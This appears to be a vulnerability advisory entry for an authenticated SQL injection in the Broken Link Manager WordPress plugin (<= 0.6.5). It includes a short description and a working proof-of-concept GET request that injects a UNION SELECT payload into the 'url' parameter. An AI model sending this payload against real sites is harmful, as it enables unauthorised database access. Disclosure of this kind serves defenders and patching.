Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection

2021-07-2400:00:00

wpvulndb

155

broken link manager

sql injection

admin+ authorization

http request

EPSS

0.001

Percentile

45.0%

JSON

The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue

GET /wp-admin/admin.php?page=wblm-edit-url&url=-4966%20UNION%20ALL%20SELECT%20NULL,current_user(),current_user(),NULL,NULL,NULL,NULL-- HTTP/1.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close